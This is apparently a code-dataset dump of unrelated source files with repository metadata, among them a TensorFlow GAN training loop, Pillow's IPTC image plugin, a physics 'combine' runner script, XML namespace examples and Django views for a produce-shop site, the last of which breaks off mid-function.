D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logit_real, labels=tf.ones_like(D_logit_real)))
D_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logit_fake, labels=tf.zeros_like(D_logit_fake)))
D_loss = D_loss_real + D_loss_fake
G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logit_fake, labels=tf.ones_like(D_logit_fake)))
D_solver = tf.train.AdamOptimizer().minimize(D_loss, var_list=theta_D)
G_solver = tf.train.AdamOptimizer().minimize(G_loss, var_list=theta_G)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
if not os.path.exists('out/'):
os.makedirs('out/')
i = 0
for it in range(1000000):
if it % 1000 == 0:
n_sample = 16
Z_sample = sample_Z(n_sample, Z_dim)
y_sample = np.zeros(shape=[n_sample, y_dim])
y_sample[:, 5] = 1
samples = sess.run(G_sample, feed_dict={Z: Z_sample, y:y_sample})
fig = plot(samples)
plt.savefig('out/{}.png'.format(str(i).zfill(3)), bbox_inches='tight')
i += 1
plt.close(fig)
X_mb, y_mb = mnist.train.next_batch(mb_size)
Z_sample = sample_Z(mb_size, Z_dim)
_, D_loss_curr = sess.run([D_solver, D_loss], feed_dict={X: X_mb, Z: Z_sample, y:y_mb})
_, G_loss_curr = sess.run([G_solver, G_loss], feed_dict={Z: Z_sample, y:y_mb})
if it % 1000 == 0:
print('Iter: {}'.format(it))
print('D loss: {:.4}'. format(D_loss_curr))
print('G_loss: {:.4}'.format(G_loss_curr))
print() | [
"332897864@qq.com"
] | 332897864@qq.com |
5613be8e39c81aef65ec60ef432167af18caae0d | 6e22c9bc6dd2bb442345a1c6759249fc3211322b | /venv/lib/python3.8/site-packages/PIL/IptcImagePlugin.py | 1be000c7d32695eefd3bd31b691a4c32a85ae422 | [] | no_license | Sankalpa830/NHPE | b4ba283f602b15a2ae53afaeb06ed11354879f76 | ac2615f218d35bd0d8a24b06abb37ef77d321a72 | refs/heads/main | 2023-07-14T20:58:14.639187 | 2021-09-01T08:03:27 | 2021-09-01T08:03:27 | 401,979,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,961 | py | #
# The Python Imaging Library.
# $Id$
#
# IPTC/NAA file handling
#
# history:
# 1995-10-01 fl Created
# 1998-03-09 fl Cleaned up and added to PIL
# 2002-06-18 fl Added getiptcinfo helper
#
# Copyright (c) Secret Labs AB 1997-2002.
# Copyright (c) Fredrik Lundh 1995.
#
# See the README file for information on usage and redistribution.
#
import os
import tempfile
from . import Image, ImageFile
from ._binary import i8
from ._binary import i16be as i16
from ._binary import i32be as i32
from ._binary import o8
COMPRESSION = {1: "raw", 5: "jpeg"}
PAD = o8(0) * 4
#
# Helpers
def i(c):
return i32((PAD + c)[-4:])
def dump(c):
for i in c:
print("%02x" % i8(i), end=" ")
print()
##
# Image plugin for IPTC/NAA datastreams. To read IPTC/NAA fields
# from TIFF and JPEG files, use the <b>getiptcinfo</b> function.
class IptcImageFile(ImageFile.ImageFile):
format = "IPTC"
format_description = "IPTC/NAA"
def getint(self, key):
return i(self.info[key])
def field(self):
#
# get a IPTC field header
s = self.fp.read(5)
if not len(s):
return None, 0
tag = i8(s[1]), i8(s[2])
# syntax
if i8(s[0]) != 0x1C or tag[0] < 1 or tag[0] > 9:
raise SyntaxError("invalid IPTC/NAA file")
# field size
size = i8(s[3])
if size > 132:
raise OSError("illegal field length in IPTC/NAA file")
elif size == 128:
size = 0
elif size > 128:
size = i(self.fp.read(size - 128))
else:
size = i16(s[3:])
return tag, size
def _open(self):
# load descriptive fields
while True:
offset = self.fp.tell()
tag, size = self.field()
if not tag or tag == (8, 10):
break
if size:
tagdata = self.fp.read(size)
else:
tagdata = None
if tag in self.info:
if isinstance(self.info[tag], list):
self.info[tag].append(tagdata)
else:
self.info[tag] = [self.info[tag], tagdata]
else:
self.info[tag] = tagdata
# mode
layers = i8(self.info[(3, 60)][0])
component = i8(self.info[(3, 60)][1])
if (3, 65) in self.info:
id = i8(self.info[(3, 65)][0]) - 1
else:
id = 0
if layers == 1 and not component:
self.mode = "L"
elif layers == 3 and component:
self.mode = "RGB"[id]
elif layers == 4 and component:
self.mode = "CMYK"[id]
# size
self._size = self.getint((3, 20)), self.getint((3, 30))
# compression
try:
compression = COMPRESSION[self.getint((3, 120))]
except KeyError as e:
raise OSError("Unknown IPTC image compression") from e
# tile
if tag == (8, 10):
self.tile = [
("iptc", (compression, offset), (0, 0, self.size[0], self.size[1]))
]
def load(self):
if len(self.tile) != 1 or self.tile[0][0] != "iptc":
return ImageFile.ImageFile.load(self)
type, tile, box = self.tile[0]
encoding, offset = tile
self.fp.seek(offset)
# Copy image data to temporary file
o_fd, outfile = tempfile.mkstemp(text=False)
o = os.fdopen(o_fd)
if encoding == "raw":
# To simplify access to the extracted file,
# prepend a PPM header
o.write("P5\n%d %d\n255\n" % self.size)
while True:
type, size = self.field()
if type != (8, 10):
break
while size > 0:
s = self.fp.read(min(size, 8192))
if not s:
break
o.write(s)
size -= len(s)
o.close()
try:
with Image.open(outfile) as _im:
_im.load()
self.im = _im.im
finally:
try:
os.unlink(outfile)
except OSError:
pass
Image.register_open(IptcImageFile.format, IptcImageFile)
Image.register_extension(IptcImageFile.format, ".iim")
def getiptcinfo(im):
"""
Get IPTC information from TIFF, JPEG, or IPTC file.
:param im: An image containing IPTC data.
:returns: A dictionary containing IPTC information, or None if
no IPTC information block was found.
"""
import io
from . import JpegImagePlugin, TiffImagePlugin
data = None
if isinstance(im, IptcImageFile):
# return info dictionary right away
return im.info
elif isinstance(im, JpegImagePlugin.JpegImageFile):
# extract the IPTC/NAA resource
photoshop = im.info.get("photoshop")
if photoshop:
data = photoshop.get(0x0404)
elif isinstance(im, TiffImagePlugin.TiffImageFile):
# get raw data from the IPTC/NAA tag (PhotoShop tags the data
# as 4-byte integers, so we cannot use the get method...)
try:
data = im.tag.tagdata[TiffImagePlugin.IPTC_NAA_CHUNK]
except (AttributeError, KeyError):
pass
if data is None:
return None # no properties
# create an IptcImagePlugin object without initializing it
class FakeImage:
pass
im = FakeImage()
im.__class__ = IptcImageFile
# parse the IPTC information chunk
im.info = {}
im.fp = io.BytesIO(data)
try:
im._open()
except (IndexError, KeyError):
pass # expected failure
return im.info
| [
"88698739+Sankalpa830@users.noreply.github.com"
] | 88698739+Sankalpa830@users.noreply.github.com |
f5800ecfc3419ee1d3066b980a2439658b3d7d09 | 8b2b07aff10727a00e243766458412f01393b524 | /Limits/python/combineUtils.py | 0b489f9add3d8339a4567175a69df32482f44938 | [] | no_license | adeiorio/Stat | 89db0deadbcca01a9204800a46a837a8cf0acd45 | f3968faca0cf72dff7abfdc26bcf2f63ec9fd6a0 | refs/heads/master | 2022-12-07T11:31:09.958027 | 2022-11-22T10:18:31 | 2022-11-22T10:18:31 | 298,411,783 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 5,547 | py | import os
import subprocess
from Stat.Limits.settings import *
def runCombine(cmdStr, logFile):
"run combine for a specific case"
cmd = (cmdStr)
print os.getcwd()
print cmd
#writer = open(logFile, 'w')
#process = subprocess.call(cmd, shell = True, stdout=writer)
print cmd + " 2>&1 | tee " + logFile
os.system(cmd + " 2>&1 | tee " + logFile)
return
def runSinglePoint(path_, mZprime, mDark, rinv, alpha, categories, method, runSingleCat):
print "evaluate limit for mZprime = ", mZprime, " GeV, mDark = ", mDark, " GeV, rinv = ", rinv, " , alpha = ", alpha
path = ("%s/%s_mDark%s_rinv%s_alpha%s" % (path_, mZprime, mDark, rinv, alpha) )
print "path: ", path
if(os.path.exists(path)):
os.chdir(path)
if len(categories)>1:
cmd = "combineCards.py SVJ_mZprime%s_mDark%s_rinv%s_alpha%s_*_%s.txt > SVJ_mZprime%s_mDark%s_rinv%s_alpha%s_%s.txt" % (mZprime, mDark, rinv, alpha, method, mZprime, mDark, rinv, alpha, method)
print cmd
os.system(cmd)
runCombine("combine -M Asymptotic -n SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + " -\
m " + mZprime + " SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + method + ".txt", "asymptotic_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + method + ".log")
for cat in categories:
print "category: " + (cat)
cat = cat+"_"+method
if(runSingleCat): runCombine("combine -M Asymptotic -S " + opt.syst + " -n SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + cat + " -m" + mZprime + " SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + cat +".txt", "asymptotic_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + cat + ".log")
#if(runSingleCat and opt.sig > 0):
# runCombine("combine -M ProfileLikelihood -S " + opt.syst + " -n SVJ" + post + " -m %s --signif --pvalue -t 1000 --toysFreq --expectSignal=1 SVJ" + post + ".txt", "profileLikelihood" + post + ".log")
os.chdir("..")
def runSinglePointWprime(path_, mWprime, width, chir, categories, method, runSingleCat, unblind):
mass=mWprime
print "evaluate limit for mWprime = ", mWprime, " GeV"
path = ("%s/WP_M%sW%s_%s" % (path_, mass, width, chir) )
print "==>path: ", path
print os.path.exists(path)
extraoption = " -t -1 "
if unblind:
extraoption=""
if(os.path.exists(path)):
print "ok i'm in the directory"
os.chdir(path)
print "We are in the right folder ", len(categories)
if len(categories)>=1:
if len(years)>1:
cmd = "combineCards.py "
for year in years:
for cat in categories:
cmd += cat+year+"=WP_M%sW%s_%s_%s_%s_%s.txt " %(mass, width, chir, cat, year, method)
cmd += "> WP_M%sW%s_%s_%s.txt" % (mass, width, chir, method)
print cmd
os.system(cmd)
runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + method + " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + method + ".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + method + ".log")
else:
for year in years:
cmd = "combineCards.py "
for cat in categories:
cmd += cat+"=WP_M%sW%s_%s_%s_%s_%s.txt " %(mass, width, chir, cat, year, method)
cmd += "> WP_M%sW%s_%s_%s.txt" % (mass, width, chir, method)
print cmd
os.system(cmd)
runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + method + " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + method + ".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + method + ".log")
if(runSingleCat):
for cat in categories:
print "category: " + (cat)
cat = cat+"_"+year+"_"+method
print "WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt"
print "combine -M Asymptotic "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + cat + " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + cat + ".log"
runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + cat+ " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + cat + ".log")
else:
for year in years:
for cat in categories:
print "category: " + (cat)
cat = cat+"_"+year+"_"+method
if(runSingleCat): runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + cat+ " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + cat + ".log")
os.chdir("..")
| [
"adeiorio@cern.ch"
] | adeiorio@cern.ch |
df42a53a9946c65aa65daf196e5ae7312595f312 | 3640d0ce7e461aaebe6452ac426e4d9c2c2a0f39 | /ch6/namespace_xml.py | c0e61259445f8b40eb1bf905c168ff0cd1bb48eb | [] | no_license | chhhaya/pythonlearn | c50fb2ff019fb5558095de358467b58b570e021b | 3589cfcaee8aacaf4641a6ad27b21147d6890ce7 | refs/heads/master | 2021-01-01T18:30:04.548920 | 2015-02-10T13:33:36 | 2015-02-10T13:33:36 | 27,026,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,702 | py | from xml.etree.ElementTree import parse, iterparse
doc = parse('namespace.xml')
print(doc.findtext('author'))
print(doc.find('content'))
print(doc.find('content/html'))
# None
print(doc.find('content/{http://www.w3.org/1999/xhtml}html'))
# find
print(doc.find('content/{http://www.w3.org/1999/xhtml}html/head/title'))
# None
print(doc.find('content/{http://www.w3.org/1999/xhtml}html/'
'{http://www.w3.org/1999/xhtml}head/'
'{http://www.w3.org/1999/xhtml}title'))
# find
class XMLNamespaces:
def __init__(self, **kwargs):
self.namespaces = {}
for name, uri in kwargs.items():
self.register(name, uri)
def register(self, name, uri):
self.namespaces[name] = '{' + uri + '}'
def __call__(self, path):
return path.format_map(self.namespaces)
ns = XMLNamespaces(html='http://www.w3.org/1999/xhtml')
print(doc.find(ns('content/{html}html')))
# find
print(doc.findtext(ns('content/{html}html/{html}head/{html}title')))
# Hello world
print('--'*10)
for evt, elem in iterparse('namespace.xml', ('start', 'end', 'start-ns', 'end-ns')):
print(evt, elem)
# end <Element 'author' at 0x102231098>
# start-ns ('', 'http://www.w3.org/1999/xhtml')
# end <Element '{http://www.w3.org/1999/xhtml}title' at 0x102231228>
# end <Element '{http://www.w3.org/1999/xhtml}head' at 0x1022311d8>
# end <Element '{http://www.w3.org/1999/xhtml}h1' at 0x1022312c8>
# end <Element '{http://www.w3.org/1999/xhtml}body' at 0x102231278>
# end <Element '{http://www.w3.org/1999/xhtml}html' at 0x102231188>
# end-ns None
# end <Element 'content' at 0x1022310e8>
# end <Element 'top' at 0x10222cf98>
### 推荐用lxml库,能处理复杂情况 | [
"chhaya11@163.com"
] | chhaya11@163.com |
d0c7805015d0990484841901a310a10805e00cf6 | 39be02fe4f8e8362a7acc005f3e30dd6fe47990e | /newdata/oylereader.py | 5ebdae4fcc852f8c821d74ed40ee95c9b06e915b | [] | no_license | seferlab/geneexpress | e2f6fdaa49e40cd48d0572cd9ddb5d2f45566adb | ac35bde5ba52d24981ece74e532f46bbfff9019e | refs/heads/master | 2022-12-19T08:33:16.925160 | 2020-09-29T13:51:30 | 2020-09-29T13:51:30 | 299,619,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import os
import sys
import math
fname1 = "127 LCM time course Data Not normalized.txt"
fname2 = "127 LCM time course Quantile Normalized logbased 2 transformed.txt"
with open(fname1,"r") as infile:
for line in infile:
line = line.rstrip()
vals = line.split("\r")
splitted = vals[1].split("\t")
items1 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
with open(fname2,"r") as infile:
for line in infile:
line = line.rstrip()
vals = line.split("\r")
splitted = vals[1].split("\t")
items2 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
print items1[0:20]
print [math.log(titem,2.0) for titem in items1[0:10]]
print [math.log(titem+1.0,2.0) for titem in items1[0:10]]
print items2[0:20]
print items1[8:20]
| [
"70752445+seferlab@users.noreply.github.com"
] | 70752445+seferlab@users.noreply.github.com |
0a8292376d38f8cb8f4dcc03a49cad69ea965165 | c384c1f8062f01a6a343e4aad7fcd231a906dbf5 | /python/How many char in it.py | 7bbe3199b90ea812ec236302dcec20ed4fb4c100 | [] | no_license | RawitSHIE/Algorithms-Training-Python | b9bf95ccc7b3974de78f290492d646679d05ae4b | 02ba71f88d18e48b35046564fe6f61911db31ac4 | refs/heads/master | 2021-03-24T12:34:02.101117 | 2017-12-10T14:15:40 | 2017-12-10T14:15:40 | 109,127,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 942 | py | """How many char in it"""
def main():
"""chr count"""
text = list(input())
lower, upper, nlow, nup = [], [], [], []
alpha = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
for i in range(len(alpha)):
if alpha[i] in text:
text2 = sorted(set(text))
for j in range(len(text2)):
if text2[j] in 'abcdefghijklmnopqrstuvwxyz':
lower.append(text2[j])
nlow.append(text.count(text2[j]))
elif text2[j] in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
upper.append(text2[j])
nup.append(text.count(text2[j]))
lista = lower + upper
listb = nlow + nup
for k in range(len(lista)):
print(lista[k],":" , listb[k])
break
elif not(alpha[len(alpha)-1] in text):
print("\\@#!$#'\\\\\"$!%&{\"")
break
main()
| [
"Rawitgun@gmail.com"
] | Rawitgun@gmail.com |
52860b1da6917fcd830a4b178bd3d28e8c60bf70 | 99dfd25f07b748e0b9b04ac300e135dc20570e1c | /cart/urls.py | 1731b6a31f6bbea06b4fcbb367549265a3127dd2 | [] | no_license | suipingooi/tgc10-django-deploy-checkpointPAUL | 1ec45e7135263703ff3472216f8fdcfdb379d7f3 | 46b62cdce8396c2b0cc57ec1fca4e77c0eee1e1a | refs/heads/master | 2023-04-16T05:11:20.535480 | 2021-04-14T12:02:43 | 2021-04-14T12:02:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | from django.urls import path
import cart.views
urlpatterns = [
path('add/<book_id>', cart.views.add_to_cart,
name="add_to_cart"),
path('', cart.views.view_cart, name='view_cart'),
path('remove/<book_id>', cart.views.remove_from_cart,
name="remove_from_cart"),
path('update_quantity/<book_id>', cart.views.update_quantity,
name="update_cart_quantity")
]
| [
"chorkunxin@yahoo.com"
] | chorkunxin@yahoo.com |
41dabe5b0e30f6ff89cb7846901f93f3873942e9 | 47c6de7d0e3c90493af4b026914cf5386e27fc5b | /mainserver/consumers.py | 293e2c0c232845ff25eac232d0721930d1ce71f8 | [] | no_license | bvishal8510/saemain | b97676916efcd4d5987aa7943834ad5f4455ecc5 | 3b812a2f24ada3435735d92058c4aba4e0c6eed5 | refs/heads/master | 2020-03-11T10:28:11.708212 | 2018-05-07T06:06:42 | 2018-05-07T06:06:42 | 129,943,695 | 0 | 0 | null | 2019-10-21T15:33:51 | 2018-04-17T17:50:08 | Python | UTF-8 | Python | false | false | 2,879 | py | import json
from channels import Group, Channel
from channels.auth import channel_session_user, channel_session_user_from_http
from .models import User_main
from django.core import serializers
@channel_session_user_from_http
def ws_connect(message):
pass
# print(4)
# message.reply_channel.send({"accept": True})
# message.channel_session['rooms'] = []
# # print(dict(message))
# @channel_session_user
def ws_disconnect(message):
pass
# print(5)
# for room_id in message.channel_session.get("rooms", set()):
# try:
# room = Room.objects.get(pk=room_id)
# room.websocket_group.discard(message.reply_channel)
# except Room.DoesNotExist:
# pass
def ws_receive(message):
pass
# print(6)
# payload = json.loads(message['text'])
# payload['reply_channel'] = message.content['reply_channel']
# Channel("chat.receive").send(payload)
# @catch_client_error
# @channel_session_user
# def chat_join(message):
# print(7)
# l1=[]
# l2=[]
# room = get_room_or_error(message["room"], message.user)
# if NOTIFY_USERS_ON_ENTER_OR_LEAVE_ROOMS:
# room.send_message(None, message.user, MSG_TYPE_ENTER)
# log = Comments.objects.filter(room=message["room"])
# for l in log:
# l1.append(l.comment)
# l1.append(str(l.user))
# l2.extend([l1])
# l1=[]
# # log1 = serializers.serialize('json', log)
# # print("----",log1)
# # for i in log1:
# # print(i)
# # print("=========",log1)
# room.websocket_group.add(message.reply_channel)
# message.channel_session['rooms'] = list(set(message.channel_session['rooms']).union([room.id]))
# message.reply_channel.send({
# "text": json.dumps({
# "join": str(room.id),
# "title": room.title,
# "d":l2,
# }),
# })
# @channel_session_user
# @catch_client_error
# def chat_leave(message):
# print(9)
# room = get_room_or_error(message["room"], message.user)
# if NOTIFY_USERS_ON_ENTER_OR_LEAVE_ROOMS:
# room.send_message(None, message.user, MSG_TYPE_LEAVE)
# room.websocket_group.discard(message.reply_channel)
# message.channel_session['rooms'] = list(set(message.channel_session['rooms']).difference([room.id]))
# message.reply_channel.send({
# "text": json.dumps({
# "leave": str(room.id),
# }),
# })
# @catch_client_error
# @channel_session_user
# def chat_send(message):
# print(10)
# if int(message['room']) not in message.channel_session['rooms']:
# raise ClientError("ROOM_ACCESS_DENIED")
# room = get_room_or_error(message["room"], message.user)
# Comments.objects.create(room = message["room"],user=message.user, comment=message["message"])
# room.send_message(message["message"], message.user) | [
"baghel.vishal124124@gmail.com"
] | baghel.vishal124124@gmail.com |
236fc4fd5bc7b69db58de748d2cb1eace6d41786 | bc52ee3856ada8acff0378298a2b8a8960c7c9db | /venv/bin/tox | bf7d98656f6f04fa08dd8a3578368f83260d30b5 | [] | no_license | Alone-elvi/e-lib-Flask | 345f71a60cb8480fa04364924a9ee4c997ab8c2b | 1a25a353aa6fbfd37d0af5255651943e7c941581 | refs/heads/master | 2022-12-12T13:17:05.356615 | 2019-08-04T15:05:25 | 2019-08-04T15:05:25 | 200,500,629 | 0 | 1 | null | 2022-12-08T05:58:25 | 2019-08-04T14:09:33 | Python | UTF-8 | Python | false | false | 263 | #!/home/alone5elvi/MEGA/Programming/Python/Flask/e-lib/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from tox import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"alone.elvi@gmail.com"
] | alone.elvi@gmail.com | |
0d3751111c62a6939a15a28d136ea4746c6a9726 | 6ff62bd52c889483dd2445d6c7c7239d8ac8f870 | /NBIOT_position_system/real_time_monitoring/migrations/0002_auto_20180330_1049.py | 2d7958a34fd7c73b83eb81ad53dacccdf9b94fb6 | [] | no_license | zhangc-rw/position_service | 830c1e5fbf4d9bc4a307aa663d4193dc0214f5b7 | 104b81dc40ff777a94ee18ff63422c89c5a20cf3 | refs/heads/master | 2020-03-12T13:37:52.967126 | 2018-12-06T08:18:30 | 2018-12-06T08:18:30 | 130,646,760 | 0 | 1 | null | 2018-04-24T01:35:52 | 2018-04-23T05:55:45 | Python | UTF-8 | Python | false | false | 968 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-03-30 02:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('real_time_monitoring', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='target',
name='carrier_name',
field=models.CharField(default='', max_length=100),
),
migrations.AddField(
model_name='target',
name='sex',
field=models.CharField(default='男', max_length=15),
),
migrations.AlterField(
model_name='target',
name='height',
field=models.CharField(default='0', max_length=20),
),
migrations.AlterField(
model_name='target',
name='velocity',
field=models.CharField(default='0', max_length=20),
),
]
| [
"1031145995@qq.com"
] | 1031145995@qq.com |
c30e714db427687e2c49b5ae2143f6f504edbc8c | 50cf35543575af09e99f8b7ab88d47dbf16aede0 | /server/products/urls.py | 7c08d700d462ebf8c2698a91371b3329733928c3 | [] | no_license | igrmaurat/GB_Django | b0949f45e75c5ab009f17752670ded25c551a52e | 555377a36f4e69c82060d9f6dc4ee7a9252d8260 | refs/heads/master | 2020-04-02T00:43:50.165667 | 2018-12-03T14:10:13 | 2018-12-03T14:10:13 | 153,818,946 | 0 | 0 | null | 2018-12-03T14:10:14 | 2018-10-19T17:31:15 | Python | UTF-8 | Python | false | false | 492 | py | from django.urls import path
# Импортируем свою функцию
from .views import (
catalog,
product,
product_create,
product_update,
product_delete
)
app_name = 'products'
urlpatterns = [
path('<int:pk>/delete', product_delete, name = 'delete'),
path('<int:pk>/update', product_update, name = 'update'),
path('create/', product_create, name = 'create'),
path('', catalog, name="catalog"),
path('<int:pk>/', product, name="product"),
]
| [
"igrmaurat@mail.ru"
] | igrmaurat@mail.ru |
ad37fcf92859439197f53e93bff59cfbc036b3fc | 065a25701273fa6be10d41ceca24148c6442f02f | /FarMeKart/views.py | ee35917e11a61bf7a0b1778e57d6a8756f44c5b7 | [] | no_license | Gunapriya6/FarMeKart | 980cfffe08a15c21b90e6886d411df361165df63 | 551d3053365c5581de414ff2165e2e807c43b13c | refs/heads/master | 2023-06-07T19:54:36.011198 | 2021-06-29T12:15:54 | 2021-06-29T12:15:54 | 376,298,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,795 | py | from django.shortcuts import render,redirect
from FarMeKart.forms import UsregFo,ChpwdForm,UpdPfle,Vegfr,UpdVgtab,Userp,Usperm,UpdPfle1,CancelForm,UpdPfle2,PlaceorderForm
from django.contrib.auth.decorators import login_required
from farmer import settings
from django.core.mail import send_mail
from django.core.mail import EmailMessage
from django.contrib.auth.models import User,AbstractUser
from FarMeKart.models import Vegpro,User,Cart,Myorders,Orders
import sys
from django.contrib import messages
import secrets
from django.contrib.auth import authenticate,login
from django.http import HttpResponse
def quantity(request,id):
c=Cart.objects.get(id=id)
c.qunatity=c.qunatity+1
c.save()
return redirect('/cartdetails')
def remqun(request,id):
c=Cart.objects.get(id=id)
c.qunatity=c.qunatity-1
c.save()
return redirect('/cartdetails')
@login_required
def delivery(request):
c=Myorders.objects.filter(prod=request.user.id,is_status=0)
return render(request,'html/delivery.html',{'de':c})
def dell(request,id):
c=Myorders.objects.get(id=id)
c.is_status=1
c.save()
return redirect('/delivery')
def Login_user(request):
if request.method=='POST':
username=request.POST.get('username')
password=request.POST.get('password')
user=authenticate(request,username=username,password=password)
if not user:
messages.add_message(request,messages.WARNING,'invalid Credentials')
return render(request,'html/login.html')
else:
login(request,user)
messages.add_message(request,messages.SUCCESS,f'Thank You {user.username}. Visit again...!')
return redirect('/')
return render(request,'html/login.html')
def remove(request,id):
c=Cart.objects.get(id=id)
c.delete()
return redirect('/cartdetails')
def contact(re):
return render(re,"html/contact.html")
def about(re):
return render(re,"html/about.html")
def registration(request):
if request.method=="POST":
k = UsregFo(request.POST)
if k.is_valid():
e = k.save(commit=False)
e.idgen = secrets.token_hex(3)
sb = "FarMeKart"
mg = "Hi Welcome{}. You have successfully registered for FarMeKart portal. Your id is {}.".format(e.username,e.idgen)
sd = settings.EMAIL_HOST_USER
snt = send_mail(sb,mg,sd,[e.email])
if snt == 1:
e.save()
return redirect('/lg')
else:
return redirect('/')
k=UsregFo()
return render(request,'html/register.html',{'h':k})
@login_required
def cgf(re):
if re.method=="POST":
c=ChpwdForm(user=re.user,data=re.POST)
if c.is_valid():
c.save()
return redirect('lg/')
c=ChpwdForm(user=re.user)
return render(re,'html/changepassword.html',{'t':c})
@login_required
def profile(req):
return render(req,'html/profile.html')
@login_required
def updprofile(request):
if request.method == "POST":
t = UpdPfle(request.POST,instance=request.user)
if t.is_valid():
t.save()
return redirect('/pro')
t = UpdPfle(instance=request.user)
return render(request,'html/updateprofile.html',{'z':t})
@login_required
def dashboard(re):
return render(re,'html/dashboard.html')
@login_required
def farmerdashboard(request):
return render(request,'html/farmerdashboard.html')
@login_required
def vegf(request):
t = Vegpro.objects.filter(a_id=request.user.id)
if request.method == "POST":
s = Vegfr(request.POST,request.FILES)
if s.is_valid():
r = s.save(commit=False)
r.a_id = request.user.id
r.save()
return redirect('/dt')
s=Vegfr()
return render(request,'html/data.html',{'a':s,'e':t})
@login_required
def infodelete(req,et):
data=Vegpro.objects.get(id=et)
print(data.id)
if req.method == "POST":
print(data.id)
data.delete()
return redirect('/dt')
return render(req,'html/userdelete.html',{'sd':data})
def itemupdate(request,y):
dc = Vegpro.objects.get(id=y)
if request.method == "POST":
m = UpdVgtab(request.POST,request.FILES,instance=dc)
if m.is_valid():
m.save()
return redirect('/dt')
m = UpdVgtab(instance=dc)
return render(request,'html/updateuser.html',{'e':m})
def items(request):
i = Vegpro.objects.filter(a_id=request.user.id)
data=Vegpro.objects.all()
for j in i:
print(j.item_name)
s = Vegpro.objects.all()
k = {}
for m in s:
g = User.objects.get(id=m.a_id)
k[m.id] = m.item_type,m.item_name,m.quantity,m.fname,m.price,m.impf,m.market_price,m.is_stock,m.create_date,g.username
f = k.values()
return render(request,'html/cart.html',{'data':data,'d':f})
def addcart(request,id):
r=Vegpro.objects.get(id=id)
if request.method == 'POST':
p=Cart(user_id=request.user.id,veg_id=id)
p.save()
return redirect("/cartdetails")
return render(request,'html/cart.html',{'data':r})
def usr(re):
s=Userp()
return render(re,'html/user.html',{'a':s})
def requestform(request):
if request.method=="POST":
u=request.POST.get('uname')
e=request.POST.get('email')
ut=request.POST.get('utype')
ud=request.POST.get('uid')
ms=request.POST.get('msg')
f=request.FILES['fe']
a="Hi welcome "+u+"<br/>" "Requested your Role as "+ut+"<br/>" "Your ID is:"+ud
t = EmailMessage("UserRole Change",a,settings.EMAIL_HOST_USER,[settings.ADMINS[0][1],e])
t.content_subtype='html'
t.attach(f.name,f.read(),f.content_type)
t.send()
if t==1:
return redirect('/reqp')
else:
return redirect('/lg')
return render(request,'html/requestp.html')
def adminpermissions(request):
ty=User.objects.all()
return render(request,'html/adminpermissions.html',{'q':ty})
def updatepermissions(request,k):
r=User.objects.get(id=k)
if request.method == "POST":
k=Usperm(request.POST,instance=r)
if k.is_valid():
k.save()
return redirect('/gper')
k2= Usperm(instance=r)
return render(request,'html/updatepermissions.html',{'y':k2})
def updateprofile(request):
return render(request,'html/profileupdate.html')
def orgupdate(request):
z=User.objects.get(id=request.user.id)
if request.method == "POST":
p=UpdPfle1(request.POST,instance=z)
q=UpdPfle2(request.POST,instance=z)
r=UpdPfle(request.POST,instance=z)
if p.is_valid() and q.is_valid() and r.is_valid():
p.save()
q.save()
r.save()
return redirect('/profile')
p=UpdPfle1(instance=z)
q=UpdPfle2(instance=z)
r=UpdPfle(instance=z)
return render(request,'html/updatedetails.html',{'u':p,'p':q,'k':r})
def userdelete(request,id):
c=User.objects.get(id=id)
c.delete()
c.save()
return redirect('/gper')
def addcart(request,id):
